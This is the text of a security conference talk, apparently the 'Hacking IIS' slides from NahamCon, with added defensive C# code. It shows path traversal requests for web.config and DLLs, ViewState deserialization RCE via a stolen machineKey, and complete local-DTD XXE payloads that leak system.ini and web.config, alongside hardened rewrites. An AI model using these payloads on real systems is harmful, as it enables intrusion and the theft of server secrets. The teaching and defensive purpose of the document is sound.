Hacking IIS
w/ shubs
Hacking IIS - NahamCon.pdf
Dealing with HTTPAPI 2.0 Assets
Have you seen this before?
• Either you’re missing the subdomain associated with the IP address (no SSL certificate),
• or the subdomain doesn’t resolve, but you can obtain a full/partial subdomain from the SSL certificate.
Resolving the HTTPAPI 2.0 404 Error
• This is super simple, but people often skip assets when they see the HTTPAPI 2.0 404 error. This error usually means that the asset needs the correct Host header to route to the application.
• You’re not always fortunate enough to have the full subdomain provided to you via the SSL certificate.
• If you know the hostname, simply provide it in the HTTP Host header.
• Sometimes you have to bruteforce VHosts until you can access the application.
After fixing the host header
• Add a line to your /etc/hosts file to map the correct host name to the IP address of the asset.
• Run all of your scanning again, including your enumeration through IIS shortname scanner.
• Perform VHost enumeration/bruteforcing to see if there are any other applications that are present on the host.
• Find all other assets that respond with HTTPAPI 2.0 404 errors and apply the same workflow (rinse and repeat).
VHost Hopping
Accessing an internal admin panel via VHost Hopping ($1900)
• Came across an asset that looked something like apply.company.com running IIS.
• Used a large subdomain wordlist to bruteforce VHosts using Burp Intruder (%bruteforce%.company.com).
• Large and different response returned for mssql.company.com, which was not accessible externally, only accessible through “VHost Hopping”.
• This was running an MSSQL database manager/explorer (https://sourceforge.net/projects/asp-ent-man/).
Accessing the VHost
• Often, on IIS servers, there may be internal applications running under a different host name. Host name bruteforcing / VHost hopping is very effective in IIS environments.
• A simple match and replace rule to facilitate the access:
Reap the benefits
Local File Disclosure to DLLs
Typical Local File Disclosure in C#
// Web API action as shown on the slide. The flaw is on the MapPath line: fileName is
// concatenated unsanitised, so "../" sequences escape ~/Content/PDF/. Behaviour is left
// exactly as on the slide; only using directives and an assumed class wrapper are added.
using System.IO;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Web;
using System.Web.Http;

public class CategoryController : ApiController   // class name assumed
{
    [Route("v1/DownloadCategoryExcel")]
    public HttpResponseMessage DownloadCategoryExcel(string fileName)
    {
        string path = HttpContext.Current.Server.MapPath("~/Content/PDF/" + fileName);
        HttpResponseMessage httpResponseMessage = new HttpResponseMessage(HttpStatusCode.OK);
        FileStream fileStream = new FileStream(path, FileMode.Open);
        httpResponseMessage.Content = (HttpContent) new StreamContent((Stream) fileStream);
        httpResponseMessage.Content.Headers.ContentDisposition = new ContentDispositionHeaderValue("attachment");
        httpResponseMessage.Content.Headers.ContentDisposition.FileName = Path.GetFileName(path);
        httpResponseMessage.Content.Headers.ContentType = new MediaTypeHeaderValue("application/octet-stream");
        httpResponseMessage.Content.Headers.ContentLength = new long?(fileStream.Length);
        return httpResponseMessage;
    }
}
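A hardened counterpart to the method above, added here for contrast (it is not the slides' code nor any real application's): the name is restricted to a bare file name with an allowed extension, the resolved path is checked against the intended directory, and rejections return the same 404 as a missing file. The controller class name, the extension list and the ResolveSafePath helper are assumptions for this example.

```csharp
using System;
using System.IO;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Web;
using System.Web.Http;

// Hypothetical hardened controller, not code from the slides.
public class SafeDownloadController : ApiController
{
    // Only these extensions may be served from ~/Content/PDF/ (assumed list).
    private static readonly string[] AllowedExtensions = { ".pdf", ".xlsx" };

    // Maps the user-supplied name to a path inside baseDir, or returns null
    // when the request would escape the directory or name a disallowed type.
    // Kept free of HttpContext so it can be unit-tested directly.
    public static string ResolveSafePath(string baseDir, string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName))
            return null;
        try
        {
            // Reject rather than strip: "../x", "dir/x", "C:x" and "\\host\x"
            // all differ from their own GetFileName and are refused outright,
            // which also keeps traversal attempts visible in the logs.
            if (fileName != Path.GetFileName(fileName) || fileName.Contains(".."))
                return null;

            string ext = Path.GetExtension(fileName).ToLowerInvariant();
            if (Array.IndexOf(AllowedExtensions, ext) < 0)
                return null;

            // Canonicalise and require the result to stay under baseDir, so that
            // whatever encoding the framework already decoded cannot escape either.
            string root = Path.GetFullPath(baseDir)
                .TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
            string full = Path.GetFullPath(Path.Combine(root, fileName));
            return full.StartsWith(root, StringComparison.OrdinalIgnoreCase) ? full : null;
        }
        catch (ArgumentException) { return null; }      // invalid path characters
        catch (NotSupportedException) { return null; }  // stray volume separators
    }

    [Route("v1/DownloadCategoryExcel")]
    public HttpResponseMessage DownloadCategoryExcel(string fileName)
    {
        string baseDir = HttpContext.Current.Server.MapPath("~/Content/PDF/");
        string path = ResolveSafePath(baseDir, fileName);

        // Same generic 404 for traversal attempts and for missing files, so the
        // response does not reveal which names exist on disk.
        if (path == null || !File.Exists(path))
            return Request.CreateResponse(HttpStatusCode.NotFound);

        var stream = new FileStream(path, FileMode.Open, FileAccess.Read, FileShare.Read);
        var response = new HttpResponseMessage(HttpStatusCode.OK)
        {
            Content = new StreamContent(stream)
        };
        response.Content.Headers.ContentType = new MediaTypeHeaderValue("application/octet-stream");
        response.Content.Headers.ContentDisposition =
            new ContentDispositionHeaderValue("attachment") { FileName = Path.GetFileName(path) };
        response.Content.Headers.ContentLength = stream.Length;
        return response;
    }
}
```

With this in place the ../../web.config and ../../bin/Company.Web.Api.dll requests from the next slide are refused at the GetFileName check before any file is opened.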
Local file disclosure? web.config is your friend.
• Follow this resource: https://bit.ly/36D3WQg (From Path Traversal to Source Code in Asp.NET MVC Applications - Minded Security)
• DownloadCategoryExcel?fileName=../../web.config
• DownloadCategoryExcel?fileName=../../global.asax
• <add namespace="Company.Web.Api.dll" />
• DownloadCategoryExcel?fileName=../../bin/Company.Web.Api.dll
• Repeat for other namespaces if necessary.
Local File Disclosure → RCE
ASP.NET Viewstate Deserialization
• Nominated for a Pwnie Award for “most under-hyped research”: https://bit.ly/2MzJ1qI & white paper: https://bit.ly/2NDZc73
• For IIS webservers, if you can read the web.config file, you can almost always get RCE.
• Obtain the machineKey variable from the web.config file (validationKey, decryptionKey).
• https://github.com/0xacb/viewgen
• VIEWSTATE → ObjectStateFormatter (Insecure Deserialization) → RCE
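Because a leaked machineKey is what turns the web.config read into RCE, the defensive response is to rotate it on every server in the farm at once; this added C# helper (not from the slides or from viewgen) generates a replacement element with fresh CSPRNG-backed keys. The key lengths (64-byte validationKey for HMACSHA256, 32-byte decryptionKey for AES) are choices made for this example.

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

// Hypothetical helper for rotating a burnt machineKey; not code from the slides.
public static class MachineKeyRotation
{
    // Returns `count` random bytes from the OS CSPRNG as lowercase hex, the
    // encoding web.config expects for validationKey and decryptionKey.
    public static string RandomHex(int count)
    {
        var buf = new byte[count];
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(buf);
        var sb = new StringBuilder(count * 2);
        foreach (byte b in buf)
            sb.Append(b.ToString("x2"));
        return sb.ToString();
    }

    // Builds a replacement <machineKey> element. The same element must be
    // deployed to every server sharing ViewState, and the old one retired
    // everywhere in the same change, otherwise the leaked key still verifies.
    public static string NewMachineKeyElement()
    {
        return string.Format(
            "<machineKey validationKey=\"{0}\" decryptionKey=\"{1}\" " +
            "validation=\"HMACSHA256\" decryption=\"AES\" />",
            RandomHex(64), RandomHex(32));
    }

    public static void Main()
    {
        Console.WriteLine(NewMachineKeyElement());
    }
}
```

Rotation invalidates every ViewState signed with the old key, so the leaked web.config no longer lets a forged __VIEWSTATE reach ObjectStateFormatter.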
Using DNSpy
Targeting Dependencies
• Let’s say you come across an endpoint like the following:
• /admin/cutesoft_client/cuteeditor/uploader.ashx
• Cutesoft Editor is available for download via http://cutesoft.net/downloads/12/default.aspx.
• The ZIP file that can be downloaded from the above URL contains a number of DLL files, but no source code.
• We can use DNSpy to analyse the source code and find vulnerabilities.
Source Code Analysis through DNSpy
• https://github.com/dnSpy/dnSpy/releases
• DNSpy is capable of reversing assemblies (i.e. DLL files) back into source code. Simply load the DLL file and export the source code project.
Navigating through DNSpy
Complex XXE Vectors
Constraints
• No outbound HTTP traffic. The only outbound traffic possible is DNS.
• Your external entity is not being displayed in the response anywhere.
• You cannot use an external DTD because you cannot reach your external host via HTTP.
• Thankfully, stack traces are enabled.
• How do you exploit this XXE?
• XXE Payloads available here: https://bit.ly/3cF8pWs
Local DTDs (Attempt 1)
• https://bit.ly/2LjXoyM (Exploiting XXE with local DTD files)
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM
"file:///C:/Windows/System32/wbem/xml/cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file:///c:/windows/system.ini">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<message>any text</message>
Slide annotations on the payload: Local DTD, Local File to Read, Side Channel Leak.
Stack Trace But No Love
Error parsing request: System.Xml.XmlException: An error occurred while parsing EntityName. Line 37, position 46.
at System.Xml.XmlTextReaderImpl.Throw(Exception e)
at System.Xml.DtdParser.ScanEntityName()
at System.Xml.DtdParser.ScanLiteral(LiteralType literalType)
at System.Xml.DtdParser.ScanEntity2()
at System.Xml.DtdParser.ParseEntityDecl()
at System.Xml.DtdParser.ParseSubset()
at System.Xml.DtdParser.ParseInDocumentDtd(Boolean saveInternalSubset)
at System.Xml.DtdParser.Parse(Boolean saveInternalSubset)
at System.Xml.DtdParser.System.Xml.IDtdParser.ParseInternalDtd(IDtdParserAdapter adapter, Boolean saveInternalSubset)
at System.Xml.XmlTextReaderImpl.ParseDtd()
at System.Xml.XmlTextReaderImpl.ParseDoctypeDecl()
at System.Xml.XmlTextReaderImpl.ParseDocumentContent()
at System.Xml.XmlLoader.Load(XmlDocument doc, XmlReader reader, Boolean preserveWhitespace)
at System.Xml.XmlDocument.Load(XmlReader reader)
at System.Xml.XmlDocument.LoadXml(String xml)
No data, parsing error 😭
Local DTDs (Attempt 2)
• A huge thank you to Robert Vulpe on Twitter for this trick: @nytr0gen_
<?xml version="1.0" ?>
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM
&#x27;file://nonexistent/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
]><xxx>cacat</xxx>
Added a # so that the file entity is part of a fragment identifier.
🎉🎉🎉🎉 Fragment Identifier Error: Partial File Contents
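Both attempts above depend on the parser processing the internal DTD, resolving file:// URIs and handing the resulting exception back to the client. The added C# below (not from the slides) shows the .NET reader settings that refuse such documents before any entity is resolved, exercised on a constructed document of the same shape as Attempt 2; the placeholder paths and the SafeXml class are assumptions.

```csharp
using System;
using System.IO;
using System.Xml;

// Hypothetical hardened loader; not code from the slides.
public static class SafeXml
{
    // Parses untrusted XML with DTD processing prohibited and no resolver, so
    // neither the local DTD nor the file:// entities are ever fetched.
    // Throws XmlException on any document carrying a DOCTYPE.
    public static XmlDocument LoadUntrusted(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,  // reject <!DOCTYPE ...> outright
            XmlResolver = null,                      // never fetch external resources
            MaxCharactersFromEntities = 1024         // cap expansion if DTDs are ever allowed
        };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            var doc = new XmlDocument { XmlResolver = null };
            doc.Load(reader);
            return doc;
        }
    }

    // Returns true when the document is refused. This is the one place where the
    // parse error becomes a generic message: the exception (the stack trace the
    // slides relied on) goes to the server log only, never into the response.
    public static bool IsRejected(string xml, out string clientMessage)
    {
        try
        {
            LoadUntrusted(xml);
            clientMessage = null;
            return false;
        }
        catch (XmlException ex)
        {
            Console.Error.WriteLine(ex);   // server-side log only
            clientMessage = "Malformed request.";
            return true;
        }
    }

    public static void Main()
    {
        // Constructed sample in the shape of Attempt 2, with placeholder paths.
        const string payload =
            "<?xml version=\"1.0\"?>\n" +
            "<!DOCTYPE doc [\n" +
            "<!ENTITY % local_dtd SYSTEM \"file:///C:/placeholder/local.dtd\">\n" +
            "%local_dtd;\n" +
            "]><xxx>cacat</xxx>";
        const string benign = "<order><id>42</id></order>";

        string msg;
        Console.WriteLine(IsRejected(payload, out msg) ? "rejected: " + msg : "accepted");
        Console.WriteLine(IsRejected(benign, out msg) ? "rejected: " + msg : "accepted");
    }
}
```

Under DtdProcessing.Prohibit the reader stops at the DOCTYPE itself, so the fragment-identifier error that leaked web.config contents can never be produced.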
Partial Fuzzing w/ Short Names
Logical fuzzing of files and folders
• After running Shortname Enumeration on your target, you may end up with output like so:
› go run cmd/shortscan/main.go http://redacted/
Shortscan v0.4 // an IIS short filename enumeration tool by bitquark
Target: http://redacted/
Running: Microsoft-IIS/8.5 (ASP.NET v4.0.30319)
Vulnerable: Yes!
--------------------------------------------------------------------------------
ASPNET~1 ASPNET? ASPNET_CLIENT
LIDSDI~1 LIDSDI?
LIDSSE~1 LIDSSE?
LIDSTE~1 LIDSTE?
EASYFI~1 EASYFI?
--------------------------------------------------------------------------------
Finished! Requests: 250; Retries: 0; Sent 48277 bytes; Received 105151 bytes
Logical fuzzing of files and folders
• Try and find the most logical cut-off point.
• For example, for ffuf, you would use the following fuzzing pattern:
• LIDSDI_____ → LIDSFUZZ
• LIDSSE_____ → LIDSFUZZ
• EASYFI_____ → EASYFUZZ
• ./ffuf -w final_wordlist.txt -D -e asp,aspx,ashx,asmx -t 1000 -c -u http://redacted/lidsFUZZ
SSH: shubs@mothership ~/w/ffuf-brute $ ./ffuf -w final_fucking_wordlist.txt -D -e asp,html,aspx,ashx,asmx -t 1000 -c -u http://redacted/lidsFUZZ
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://redacted/lidsFUZZ
:: Wordlist : FUZZ: final_fucking_wordlist.txt
:: Extensions : asp html aspx ashx asmx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1000
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
test [Status: 301, Size: 154, Words: 9, Lines: 2]
TEST [Status: 301, Size: 154, Words: 9, Lines: 2]
Test [Status: 301, Size: 154, Words: 9, Lines: 2]
display [Status: 301, Size: 157, Words: 9, Lines: 2]
Display [Status: 301, Size: 157, Words: 9, Lines: 2]
Service [Status: 301, Size: 150, Words: 9, Lines: 2]
:: Progress: [700801/700801] :: Job [1/1] :: 4800 req/sec :: Duration: [0:02:26] :: Errors: 0 ::
• ./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3chars.txt
• https://bit.ly/3q2yFwY
More resources on hacking IIS
• https://bit.ly/3uzOP4N → Assetnote Youtube Channel
• https://youtu.be/HrJW6Y9kHC4 → Hacking IIS Part 1
• https://youtu.be/_4W0WXUatiw → Hacking IIS Part 2
• http://soroush.secproject.com/blog/ → My favourite blog on IIS hacking
• https://twitter.com/bitquark → Building an amazing IIS shortname scanner
• https://twitter.com/nytr0gen_ → Discovered the XXE technique for partial leakage via fragment identifier errors
assetnote.io @assetnote